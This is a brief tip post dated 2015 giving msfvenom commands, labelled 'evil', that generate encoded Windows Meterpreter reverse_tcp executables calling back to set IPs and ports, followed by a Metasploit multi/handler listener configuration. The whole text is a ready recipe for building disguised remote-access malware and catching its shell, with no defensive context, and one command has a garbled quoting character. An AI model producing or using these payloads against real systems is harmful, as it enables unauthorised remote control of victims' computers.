21.04.2015

msfvenom [meterpreter payload listener] (tip)

evil(1):
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00? LHOST=192.168.23.103 LPORT=443 -f exe > Cyberwarzone_reverse_tcp.exe

evil(2):
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 1 -f exe LHOST=192.168.0.17 LPORT=666 >Desktop/payload.exe

listen:
use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp 
set lhost 0.0.0.0 
set lport 666 exploit